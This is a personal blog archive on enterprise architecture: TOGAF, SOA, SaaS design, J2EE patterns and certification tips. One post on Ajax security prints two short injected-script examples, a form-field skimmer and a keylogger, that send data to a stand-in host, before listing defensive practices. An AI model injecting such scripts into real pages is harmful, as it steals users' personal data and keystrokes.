<div><b>Gaurav Tripathi's Blog</b></div>
<div><b>Gelling Security Architecture with TOGAF</b> (posted 2012-05-01)</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; text-align: -webkit-auto;">This article describes how to adopt the ADM cycle for enterprise security. It also includes steps for developing a security architecture that help an enterprise avoid missing a critical security concern. This article does not focus on </span><strong style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: -webkit-auto;">security architecture development methodology</strong><span style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; text-align: -webkit-auto;">; it is intended to touch on the security architecture tasks and roles, as well as the gelling of security objectives for each phase of the ADM. </span><br />
<span style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; text-align: -webkit-auto;"><br /></span><br />
<span style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; text-align: -webkit-auto;">For more detail, click on the </span><a href="http://www.articlesbase.com/information-technology-articles/gelling-security-architecture-with-togaf-5841146.html">http://www.articlesbase.com/information-technology-articles/gelling-security-architecture-with-togaf-5841146.html</a><span style="background-color: white; color: #333333; font-family: verdana, arial, serif; font-size: 12px; line-height: 18px; text-align: -webkit-auto;"> link. </span></div>
<div><b>Preparing TOGAF 9 Certification</b> (posted 2012-02-23)</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: Georgia, 'Times New Roman', serif;">Last week, I cleared TOGAF 9 Part 2, so now I'm <a href="https://www.opengroup.org/togaf9/cert/protected/certuploads/45756.pdf" target="_blank">TOGAF 9 Certified</a> :-). Being in a consulting company, it took me around 6-7 months to clear the exam (both Part 1 & 2) because of time constraints. Anyway, just sharing my experience of the exam: </span><br />
<span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span><br />
<span style="font-family: Georgia, 'Times New Roman', serif;">For Part 1: </span><br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Read the TOGAF 9 <a href="http://pubs.opengroup.org/architecture/togaf9-doc/arch/" target="_blank">documentation</a></span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Focus on the inputs & outputs of each ADM phase (especially Phases E & F)</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">High-level knowledge of the steps involved in each ADM phase</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Technical Reference Model</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Repository </span></li>
</ul>
<br />
<span style="font-family: Georgia, 'Times New Roman', serif;">Part 2 (though it's open book) is a bit tougher than Part 1 as it has scenario questions. Below are the topics/sections you should focus on:</span><span style="font-family: Georgia, 'Times New Roman', serif;"> </span><br />
<ul>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Read the TOGAF 9 <a href="http://pubs.opengroup.org/architecture/togaf9-doc/arch/" target="_blank">documentation</a></span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Focus on the inputs & outputs of each ADM phase </span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">In-depth knowledge of the steps involved in each ADM phase</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Artifacts (catalogs, matrices & diagrams) involved in each phase (especially B, C & D)</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Also read the mapping of security architecture with TOGAF</span></li>
<li><span style="font-family: Georgia, 'Times New Roman', serif;">Iterative processes & guidelines</span></li>
</ul>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div>
<span style="font-family: Georgia, 'Times New Roman', serif;">Apart from the above-mentioned points, you can also watch the Knotion TOGAF 9 series on YouTube and look at other material available on the net (TOGAF presentations etc.) </span></div>
</div>
<div><b>SOA with TOGAF</b> (posted 2011-08-02)</div>
<div>Many organizations are now facing challenges around keeping pace with current business trends and managing complex systems. Organizations are therefore looking for better business agility, better business automation, and better IT alignment to speed their business growth.</div><div><br /></div><div>In most cases, SOA helps simplify the business and eases communication between departments. It separates functions into distinct business services: units that are easily accessible and reusable. SOA focuses on agility and flexibility. The point is to create services that are easily accessible across the enterprise and can be consumed in different environments.</div><div><br /></div><div>For more detail, please visit my published article on the <a href="http://www.theserverside.com/tip/SOA-with-TOGAF">theserverside</a> website.</div>
<div><b>Guide to clear SCEA (OCMJEA) Part 2 & 3</b> (posted 2011-07-04)</div>
Moving forward from <a href="http://visitgaurav.blogspot.com/2010/08/crack-sun-certified-enterprise.html">SCEA Part 1</a>, for the Part 2 assignment you need to cover topics such as:<br /><br /><div>1. The goals and constraints of the proposed architecture</div><br /><div>2. Section on the use-case view</div><br /><div>3. Section on the logical view of the proposed architecture</div><br /><div>4. Section on the technical view of the proposed architecture - This is the most important section, as you need to cover sub-sections such as the layers of the architecture, each use-case realization with class & sequence diagrams, and the development view of the project including the package hierarchy. Also cover the NFRs mentioned in the assignment.</div><br /><div>5. 
Section on the deployment view</div><br /><div>6. Assumptions & Risks - This section is also important, as you will list all the assumptions made while designing the system. Also list the risks, such as unavailability of the application.</div><br /><div>7. Optional, but you can add annexure(s) depending on your sections</div><br /><div>For Part 3, you need to answer with respect to the NFRs (performance, security, availability etc.) mentioned in the assignment. Answer each question in points rather than in one big paragraph. </div>
<div><b>WebSphere's DynaCache Hibernate Caching Adapter</b> (posted 2010-12-21)</div>
<p style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; "><span class="Apple-style-span"><b>WebSphere Application Server</b> (especially 6.x onwards) supports <b>JPA</b> (Java Persistence API). Its default ORM tool is OpenJPA. It also supports easy plugging-in of other ORM tools. For distributed caching, WAS (WebSphere Application Server) uses <b>DynaCache</b>, which is very useful in a clustered environment. Because it has a pluggable caching architecture, any ORM tool can easily be plugged in through an ORM caching adapter.</span></p><p style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; "><span class="Apple-style-span">Hibernate is a very popular and stable ORM tool. 
But it has an issue with WAS, as there is no Hibernate caching adapter to plug into IBM's distributed caching framework.</span></p><p style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; "><span class="Apple-style-span">So I decided to make a WebSphere-Hibernate DynaCache adapter so that anyone can easily use the renowned Hibernate ORM.</span></p><p style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; "><span class="Apple-style-span">Please visit my project at <a href="http://code.google.com/p/webspherehibernateadapter/">http://code.google.com/p/webspherehibernateadapter/</a> for more detail.</span></p>
<div><b>High Scalable and Distributed Architecture</b> (posted 2010-12-06)</div>
This article describes how to achieve high scalability with <a href="http://www.oracle.com/technetwork/java/docs-135218.html">Java EE EJB 3.0</a> and <a href="http://www.springsource.org/">Spring Framework</a>, and how this hybrid solution can scale in a cloud space.<br /><br />In the enterprise world, Spring Framework with a standard ORM tool like Hibernate has gained considerable acceptance as a lightweight architecture for mid-size applications. 
Also, the Java EE 5 specification made major changes to the component architecture in an attempt to close gaps such as IoC and ORM.<br /><br />The concept of IoC is still immature in Java EE 5, and the flexibility, AOP and relative strengths of Spring and of an ORM tool like Hibernate further improve the productivity and quality of web-based applications. Because the JPA specification (part of Java EE 5) suggests a pluggable design, any JPA-compatible ORM tool can be used in any application server; for example, IBM WebSphere uses <a href="http://publib.boulder.ibm.com/infocenter/wasinfo/v7r0/index.jsp?topic=/com.ibm.websphere.nd.doc/info/ae/ae/tejb_jpadefaultpp.html">Apache OpenJPA</a> as its default provider, but <a href="http://www.hibernate.org/">Hibernate</a> can easily be plugged in.<br /><br />This article demonstrates how to build a highly scalable application with a hybrid of EJB 3.0, Spring 3.0.x and Hibernate. Spring Framework has its own remoting APIs and options, but EJB is a standard specification and can easily be migrated across application servers.<br />By designing a flexible, component-based architecture, the application uses the power of EJB 3.0, the IoC & AOP of Spring 3.0.x and the ORM capability of Hibernate.<br /><br />For more detail, visit my published article on the <a href="http://www.theserverside.com/tip/High-Scalable-Distributed-Architecture-with-EJB-Spring-Framework">theserverside</a> website.
<div><b>Ajax and Web Application Security</b> (posted 2010-09-05)</div>
<div style="text-align: left;">Nowadays Ajax, <i>meant to increase interactivity, application speed and usability,</i> is becoming increasingly popular because it internally uses the JavaScript language, which has rich user interface capabilities such as dynamic forms and their properties, pop-up controls, control over information 
display, browser properties etc.</div><div><br /></div><div>Ajax uses different web technologies, such as:</div><div><ul><li>HTML or XHTML: Provides the standards for displaying content</li><li>Cascading Style Sheets (CSS): Also provides standards for how content is displayed</li><li>JavaScript: A scripting language used for client-side, browser-based applications</li><li>Document Object Model (DOM): A standard object model used for displaying dynamic content and the related interaction.</li><li>XML and XSLT: Used to manipulate, exchange and transfer data between client and server.</li><li>XML HTTP Request (XMLHttpRequest): A client-side JavaScript API used to make HTTP connections to the server and exchange information. The information can be plain text, XML or JSON.</li><li>JavaScript Object Notation (JSON): A lightweight, text-based and language-independent data exchange format between client and server.</li></ul><div><b><u>How It Works</u></b></div></div><div>The figure below shows the flow of an AJAX request:</div><div style="text-align: center;"><br /></div><div style="text-align: center;"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgncStaMkXjM9FA1M-N_tbnOxgDMKQ110JuTGvukF-RnUijnfUcTG1taqLmIaVP8cnvZXK29bpLMDwcrj3DNv00GVlq41n5ngMmvtUywcsiJqa-s6IKC5kqSh_AYxJaVmJqMIAm/s400/Ajax.png" style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 204px;" border="0" alt="" id="BLOGGER_PHOTO_ID_5512243072653499250" /></div><div style="text-align: center;"><br /></div><div><ul><li>The user generates an event, or some asynchronous event fires at the client end, and this results in a JavaScript call</li><li>An <i>XMLHttpRequest</i> JavaScript object is created and configured with the request parameters, along with the event component identifier and user-defined values (if any).</li><li>This object makes an <b>asynchronous</b> call to the web / application server. 
The call may go to a web service, a servlet, a JSF AJAX component etc.</li><li>Based on the request, the server may fetch the desired data from a data store.</li><li>That data is pushed back to the client browser in the form of plain text, XML or JSON.</li><li>The <i>XMLHttpRequest</i> callback method receives the data, processes it and updates the HTML DOM representing the web page with the new information.</li></ul><div><b><u>AJAX Security and Vulnerabilities</u></b></div><div>AJAX has good UI (usability) capabilities, but it has some security holes that make a web application vulnerable. The vulnerability can be on the server side or the client side. Information flows between server and client as plain text, XML or JSON, which exposes server-side APIs, and insufficient security on the server side leads to unauthenticated access to the system. Use of AJAX also increases the chance of session management vulnerabilities and the risk of access to hidden URLs that are needed for AJAX requests to be processed.</div></div><div>Another issue with AJAX is visible data. 
<i>XMLHttpRequest</i> sends plain, visible text to the server and may easily reveal database fields such as Product Id and Customer Id, which can easily be manipulated by a hacker.</div><div><br /></div><div><b>a. Effects of Attack:</b></div><div><ul><li><b>Hacking Password and Cookies: </b>A hacker can easily manipulate sensitive information such as passwords and cookies by injecting scripts into any part of the DOM tree, like:</li></ul></div><blockquote>
<div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">// Injected script: on click, the field value is placed in an image URL, so the browser sends it to the third-party host</span></span></div>
<div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">function hackdata() {</span></span></div>
<div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">&nbsp;&nbsp;&nbsp;&nbsp;var data = document.getElementById("ssn").value;</span></span></div>
<div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">&nbsp;&nbsp;&nbsp;&nbsp;document.images[0].src = "http://hackdata.com/hackdata=" + data;</span></span></div>
<div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">}</span></span></div>
<div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">document.getElementById("button").onclick = hackdata;</span></span></div>
</blockquote><blockquote><span class="Apple-style-span" style="font-size: medium; ">The example above shows how a hacker can steal sensitive information. As soon as the user clicks the submit button, an asynchronous request goes to the hacker's site with the sensitive information. With the same approach, a hacker can steal cookie information.</span></blockquote><span><ul><li><b>Hacking keyboard events:</b> Sensitive information can be captured through a key logger or mouse sniffer, like:</li></ul><blockquote>
<div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">// Injected script: every key release is reported to the third-party host in the same way</span></span></div>
<div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">function hackdata(e) {</span></span></div>
<div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">&nbsp;&nbsp;&nbsp;&nbsp;document.images[0].src = "http://hackdata.com/keydata=" + e.keyCode;</span></span></div>
<div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">}</span></span></div>
<div><span class="Apple-style-span" style="color:#FF6666;"><span class="Apple-style-span" style="font-size: small;">document.body.addEventListener("keyup", hackdata, false);</span></span></div>
</blockquote>In the same way, 
mouse events can be stolen through a mouse sniffer.<br /><br /></span><div><ul><li><b>Inserting information: </b>An attacker can modify the stylesheet to eliminate sensitive information from view, for example by making the font color white.</li></ul><b>b. Best Practices:</b></div><div>The following best practices should be followed in an AJAX-based web application:</div><div><br /></div><div><ul><li>Data validation: To avoid XSS (Cross-Site Scripting), the web application must validate input data and filter out possible active and malicious content from untrusted input sources.</li><li>Avoid dynamic code generation & execution: Try to avoid dynamic code generation, such as use of the <i>eval</i> method.</li><li>Secure use of JSON: JSON is a subset of JavaScript, so it may contain malicious code, and many JavaScript libraries use the <i>eval()</i> method to convert JSON into JavaScript objects. To avoid that, use the regular expression defined in RFC 4627 to make sure that the JSON doesn't contain malicious code.</li><li>Use of "iframe": Load data from a different domain into an iframe, which gives it a JavaScript execution context and DOM tree of its own. This prevents a hacker from attacking the main page.</li><li>Use a security testing tool: Always use a vulnerability checking tool to detect potential vulnerabilities in advance.</li></ul><div>The above are a few best practices that should be followed to avoid common AJAX attacks. 
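<div>The data validation, no-<i>eval</i> and JSON practices from the list above, combined in one response handler. This is an added example, not code from the original post: the function names and sample responses are constructed, and JSON.parse is used in place of the eval() call in RFC 4627's own snippet.</div>

```javascript
// Added example (not from the original post): handling an untrusted AJAX
// response without eval(). Names and sample responses are constructed.

// RFC 4627, section 6: after removing string literals, only JSON punctuation,
// number characters and the letters of true/false/null may remain.
const RFC4627_UNSAFE = /[^,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/;
const JSON_STRING = /"(\\.|[^"\\])*"/g;

function looksLikeJson(text) {
  return typeof text === "string" &&
    !RFC4627_UNSAFE.test(text.replace(JSON_STRING, ""));
}

// JSON.parse replaces the eval() call of the RFC snippet: it builds data only,
// never runs code, and throws on input the character check let through.
function parseUntrustedJson(text) {
  if (!looksLikeJson(text)) {
    return { ok: false, error: "rejected by RFC 4627 character check" };
  }
  try {
    return { ok: true, value: JSON.parse(text) };
  } catch (err) {
    return { ok: false, error: "not well-formed JSON" };
  }
}

// Data validation: accept only the fields and types this page expects.
function validateProduct(obj) {
  if (obj === null || typeof obj !== "object" || Array.isArray(obj)) {
    return { ok: false, error: "response is not an object" };
  }
  if (!Number.isInteger(obj.id) || obj.id < 1) {
    return { ok: false, error: "id must be a positive integer" };
  }
  if (typeof obj.name !== "string" || obj.name.length < 1 || obj.name.length > 80) {
    return { ok: false, error: "name must be a string of 1-80 characters" };
  }
  return { ok: true };
}

// Output encoding: markup characters in data become inert text.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// What an XMLHttpRequest callback would run on responseText before it
// touches the DOM: parse, validate, then encode.
function renderProduct(responseText) {
  const parsed = parseUntrustedJson(responseText);
  if (!parsed.ok) return parsed;
  const checked = validateProduct(parsed.value);
  if (!checked.ok) return checked;
  const { id, name } = parsed.value;
  return { ok: true, html: '<li data-id="' + id + '">' + escapeHtml(name) + "</li>" };
}

// Constructed sample responses.
const SAMPLES = {
  good: '{"id": 7, "name": "Widget"}',
  // JavaScript appended to the data: fails the character check.
  code: '{"id": 7, "name": "Widget"}; notify()',
  // Passes the character check but is not JSON: JSON.parse rejects it.
  trailingComma: '{"id": 7,}',
  // Valid JSON, wrong type: rejected by validation.
  wrongType: '{"id": "seven", "name": "Widget"}',
  // Valid JSON whose string decodes to markup: neutralised by encoding.
  markup: '{"id": 7, "name": "\\u003cb\\u003eWidget\\u003c/b\\u003e"}',
};

for (const [label, text] of Object.entries(SAMPLES)) {
  console.log(label, JSON.stringify(renderProduct(text)));
}
```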
</div></div>
<div><b>Messaging and Cloud Computing</b> (posted 2010-09-01)</div>
<div>In today's world, maintaining the critical parameters of an application, such as high performance, availability and scalability, is a big challenge. This article explains how to achieve high performance, availability and scalability with messaging technologies, WebSphere Application Server (WAS) and Service Integration Bus (SIB). It also includes hints and best practices and shows how to configure for high availability. A cloud-enabler architecture is achievable with WAS and SIB.</div><div><br /></div><div>For more detail, please visit the <b><a href="http://www.theserverside.com/report/IBM-WebSphere-SIB-Cloud-Computing-Leveraging-the-Power">Power of Messaging by IBM WebSphere SIB & Cloud Computing</a></b> link.</div>
<div><b>Famous J2EE (Java EE) Design Patterns</b> (posted 2010-08-29)</div>
As most of my friends and juniors occasionally ask about frequently used and popular J2EE patterns, I thought of listing the patterns which every Java developer or designer should know. I'm dividing the patterns into presentation, business and integration tiers. <div><br /></div><div><b>List of popular patterns & their usage under the </b><i><b>Presentation Tier</b></i><b>: </b></div><div>1. Intercepting Filter: </div><div><ul><li>Can be used when centralized, common processing is required across requests</li><li>When pre- and post-processing is required across all or selected requests</li></ul></div><div>2. 
Front Controller (& Application Controller):</div><div><ul><li>When common logic needs to apply to multiple requests</li><li>When processing logic needs to be separated from the presentation view</li><li>When centralized, controlled access points are required</li></ul></div><div>3. View Helper:</div><div><ul><li>When template-based views such as JSP or Apache Velocity are required</li><li>When programming logic needs to be separated from the view</li></ul></div><div>4. Service To Worker:</div><div><ul><li>Service To Worker = Front Controller + Application Controller + View Helper</li><li>Any presentation framework like Apache Struts</li></ul></div><div><br /></div><div><b>List of popular patterns & their usage under the </b><i><b>Business Tier</b></i><b>:</b></div><div>1. Business Delegate:</div><div><ul><li>When the business tier is accessed from the presentation tier</li><li>Hides service creation and invocation</li></ul></div><div>2. Service Locator:</div><div><ul><li>Can be used for lookup of any enterprise resource, such as JNDI lookup, JMS, web services etc.</li><li>When centralized, reusable lookup is required (caching or re-establishing connections)</li></ul></div><div>3. Session Facade:</div><div><ul><li>When the requirement is to avoid direct client access to the application's business tier</li><li>When the requirement is to hide complex integration of business components</li></ul></div><div>4. Transfer Object:</div><div><ul><li>When the requirement is to access components of a different tier to retrieve and update data</li><li>When the requirement is to reduce remote requests across tiers and the network (enhancing network performance)</li></ul></div><div>5. 
Value List Handler:</div><div><ul><li>When the requirement is to avoid the overhead of using EJB "finder" methods</li><li>When an efficient search, and iteration over the search results, is required</li><li>Caches the search result on the server side</li></ul></div><div><br /></div><div><b>List of popular patterns & their usage under the </b><i><b>Integration Tier</b></i><b>:</b></div><div>1. Data Access Object:</div><div><ul><li>When uniform data access APIs are required</li><li>When persistent storage needs to be decoupled from the other tiers</li></ul></div><div>2. Service Activator:</div><div><ul><li>When the requirement is to call business services or EJBs asynchronously</li><li>When the requirement is to plug in topic and point-to-point messaging to enable asynchronous processing</li></ul></div><div>3. Web Service Broker:</div><div><ul><li>Used for exposing services to clients, i.e. as web services</li></ul><div>The above are the main patterns generally used in J2EE-based applications. Some patterns are used internally by frameworks like Apache Struts and by Java EE components like JPA.</div> </div>
<div><b>SaaS & Cloud Computing - Design Consideration</b> (posted 2010-08-27)</div>
Designing a SaaS application is a big challenge. There are many dimensions to consider while designing the application, such as maturity level, business goals, business & architecture principles, operational model etc.<br /><br />According to Microsoft, a SaaS application has four <a href="http://msdn.microsoft.com/en-us/library/aa479069.aspx">maturity levels</a>:<br />1. <span style="font-weight: bold;">Ad Hoc/Custom</span>: Each client or tenant has its own server instance and application code, modified to meet its requirements.<br /><br />2. 
<span style="font-weight: bold;">Configurable</span>: At this level, a separate instance of the application is hosted for each tenant or client, but the code base remains the same for every client, i.e. the application is configurable enough to support each customer.<br /><br />3. <span style="font-weight: bold;">Configurable, Multi-Tenant-Efficient</span>: A <span style="font-weight: bold;">single instance</span> serves every client or tenant, with configurable metadata providing a unique user experience and feature set for each one. The only restriction of this level is that it cannot scale across servers, so performance and availability will be issues at this level.<br /><br />4. <span style="font-weight: bold;">Scalable, Configurable, Multi-Tenant-Efficient: </span>At this level, multiple clients or tenants are supported by a load-balanced farm of identical instances, with each tenant's data kept separate and with configurable metadata providing a unique user experience and feature set for each tenant/client.<br /><br />As far as design and flexibility are concerned, a SaaS application should be designed for level 4.<br /><br />The following are the design considerations for a SaaS application:<br />1. <span style="font-weight: bold;">Multi-Tenancy</span>: The application should be designed to handle multi-tenancy, i.e. data, UI, business rules etc. should be separated per customer.<br /><br />2. <span style="font-weight: bold;">Security</span>: The application design should ensure that customer data is secure, and there should be complete separation of data between customers/tenants. Authentication should also be "pluggable" into the customer's enterprise identity management.<br /><br />3. <span style="font-weight: bold;">Availability</span>: The application should be easily scalable and clusterable so that it is available at any time.<br /><br />4. 
<span style="font-weight: bold;">Scalable</span>: The application design should be highly scalable and should easily cope with large organizations and user bases.<br /><br />5. <span style="font-weight: bold;">Data Model Extensibility</span>: The database should be easy to tailor to the needs of each vendor without affecting the others.<br /><br />6. <span style="font-weight: bold;">Flexible Presentation</span>: The UI should be highly configurable and flexible so that it can easily be customized for each vendor without affecting the others. <br /><br />7. <span style="font-weight: bold;">Performance</span>: The application should have low response time (for complex pages too) and low transaction processing time.<br /><br />8. <span style="font-weight: bold;">Configurable Business Rule/Process</span>: The application should be designed to support the addition/customization of individual tenants'/companies' business rules/processes. The application should also integrate seamlessly with the tenant's enterprise business processes.<br /><br />9. <span style="font-weight: bold;">Multi-language Support</span>: The application should support internationalization so that different tenants can use it across the Internet and around the world.<br /><br />10. <span style="font-weight: bold;">Separation of Concern</span>: The application should be designed on the concepts of SOA and separation of concerns so that it can easily be deployed in the cloud, and a cloud bus can be plugged in to communicate with different clouds and on-premises systems. 
Business agility, or time-to-market, is another advantage of this design pattern.<br /><br /><br />So, any application that follows the above design considerations can easily get the advantage of maturity "Level 4" and be ported to a cloud environment.
<div><b>SaaS and Cloud Computing - An Overview</b> (posted 2010-08-13)</div>
To understand SaaS in a simple way, just think of the email offering from Google (Gmail), where multiple clients, i.e. email ID owners, can send / receive mail and use the other features provided by Google.<br /><br />Google's mail servers are in the cloud, which can be easily scaled. So this is a perfect example of <span style="font-weight: bold;">SaaS</span> and <span style="font-weight: bold;">Cloud Computing</span>.<br /><br />The figure below helps in visualizing SaaS and the cloud space:<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbmN78rkpPt4dst9Ob6liLSQFUsOLGevLJmjgLW1Bw4s0a_809JuT6CNHX2dtLz9WCziNpcWM8oaiYZPE88yId2_kDSnU8FDn0a_HrKXN-mxOdbqILUWaAemYj9pXeLd5HNN7V/s1600/SaaS.gif"><img style="display: block; margin: 0px auto 10px; text-align: center; cursor: pointer; width: 320px; height: 224px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbmN78rkpPt4dst9Ob6liLSQFUsOLGevLJmjgLW1Bw4s0a_809JuT6CNHX2dtLz9WCziNpcWM8oaiYZPE88yId2_kDSnU8FDn0a_HrKXN-mxOdbqILUWaAemYj9pXeLd5HNN7V/s320/SaaS.gif" alt="" id="BLOGGER_PHOTO_ID_5505935890169584434" border="0" /></a>So SaaS can be 
offered as a paid service, such as a subscription service. These services can take the form of domain-specific applications such as CRM and SCM. For more detail, visit <a href="http://www.salesforce.com/">www.salesforce.com</a>. The <span style="font-weight: bold;">salesforce</span> application is a complete CRM solution deployed in its cloud environment. Generally the vendor or site user is charged on a usage basis, and each SaaS provider has a metering capability.<br /><br />Other services are free or partially free, such as web mail services (e.g. Gmail), job sites, etc.<br /><br />The main advantages of adopting the SaaS option are:<br />1. Faster time-to-market<br />2. Cost-effective options (in most cases)<br />3. Lower license cost<br />4. Nearly zero maintenance and software upgrade cost<br />5. Good option for start-up companies<br />6. Pay on a usage basis<br /><br />Apart from these advantages, SaaS applications have some issues and limitations:<br />1. Non-scalable design: a SaaS application is generally expected to handle a large customer base and scale seamlessly in the cloud, but the non-scalable nature of a SaaS application leads to deterioration in performance.<br />2. Hidden costs of the SaaS provider<br />3. 
Data security, as multiple users/customers will use the same database<br />4. Availability of the SaaS application<br /><br /><span style="font-weight: bold;">Top SaaS Providers:</span><br /><br />There are many SaaS providers across all domain areas, including CRM, SCM, health care, retail, etc. The following are the market leaders in SaaS:<br /><br />1. <span style="font-weight: bold;">salesforce</span>: It provides CRM software on demand. It has various pricing models, starting with a free subscription and a pay-as-you-go model. Currently it offers two SaaS services:<br /><ul><li>Sales Cloud: It has accounts, contacts, leads, quotes, etc.<br /></li><li>Service Cloud: It has a customer portal, knowledge base, analytics, etc.</li></ul><p>2. <span style="font-weight: bold;">Google</span>: It has a range of applications as well as web-based offerings, such as an e-mail service, calendar, document editor, spreadsheet, and some others.</p><p>3. <span style="font-weight: bold;">Zoho</span>: It also has a web-based e-mail service, document editor, presentation tool, invoicing, reporting, applicant tracking, and many more.</p><p>The next topic I am going to cover is <span style="font-weight: bold;">SaaS & Cloud Computing - Application Design Consideration</span>. 
</p>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-71604192294094404492010-08-12T23:41:00.000-07:002011-07-22T21:12:17.107-07:00Crack Sun Certified Enterprise Architect (SCEA) Exam
Most aspiring architects have frequently asked me "how to clear the SCEA (OCMJEA) exam", so I thought I would write down some basic points and an approach to crack this exam. <span style="VISIBILITY: visible" id="main"><br /><br />This certification is very easy to pass if you have an understanding of design patterns. Understanding does not mean that you know the definitions of patterns; it means you have done some Java EE based application design in the past and applied various patterns. This is going to help you in answering pattern-related questions as well as architecture-related questions.<br /><br />So if you have the above experience, then half of your battle is won. And if you haven't, then it's better to hold your horses and wait for some time .... some application design & apply patterns. "<span style="FONT-WEIGHT: bold">Practical experience is a must</span>" .......<br /><br />Other things you need to study include application security parameters, design considerations for thick clients, EJB 3.0 usage, presentation frameworks, and application integration techniques.<br /><br />A few good study materials are:<br /><span style="font-size:100%;"><br />1. The Java EE 5 Tutorial, Third Edition (http://java.sun.com/javaee/5/docs/tutorial/doc/JavaEETutorial.pdf)<br /><br />2. Core J2EE Patterns: Best Practices and Design Strategies, Second Edition<br /><br />3. Java Design: Objects, UML, and Process<br /><br />4. Designing Enterprise Applications with the J2EE Platform<br /><br />5. Enterprise Integration Patterns<br /><br />6. The Java EE 5 Tutorial - For Sun Java System Application Server 9.1<br /><br />7. Sun Certified Enterprise Architect for J2EE Study Guide<br /><br />8. 
Core Security Patterns: Best Practices and Strategies for J2EE, Web Services, and Identity Management<br /></span></span><br /><div><span style="VISIBILITY: visible" id="main"><span style="font-size:100%;">For SCEA Part 2 & 3, refer to my next <a href="http://visitgaurav.blogspot.com/2011/07/how-to-clear-scea-part-2-3.html">article</a>.</span></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-58980007046493714452009-06-01T19:41:00.000-07:002012-04-19T19:46:12.112-07:00TOGAF 9<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Things any Enterprise Architect should always remember: the phases and steps of TOGAF</span> </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNCB3iFa2Z6Am2-LZ_ScAYYonVgZU5E6fR4yMoqmfVo_vNUTyMsRYN8Wp5bgQ9kB4htFYdO-laqLyBV1JCx5QtiZ5kj7Gkr-Y5avPseMCsnM-2_cxj9VN7TAEpZFr8-MlFsQMs/s1600/togaf.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNCB3iFa2Z6Am2-LZ_ScAYYonVgZU5E6fR4yMoqmfVo_vNUTyMsRYN8Wp5bgQ9kB4htFYdO-laqLyBV1JCx5QtiZ5kj7Gkr-Y5avPseMCsnM-2_cxj9VN7TAEpZFr8-MlFsQMs/s320/togaf.png" width="250" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>TOGAF Phases</b></td></tr>
</tbody></table>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-41390135366369083562007-10-19T07:42:00.000-07:002010-12-22T01:29:49.901-08:00JSF, Spring & Hibernate - Light weight Architecture
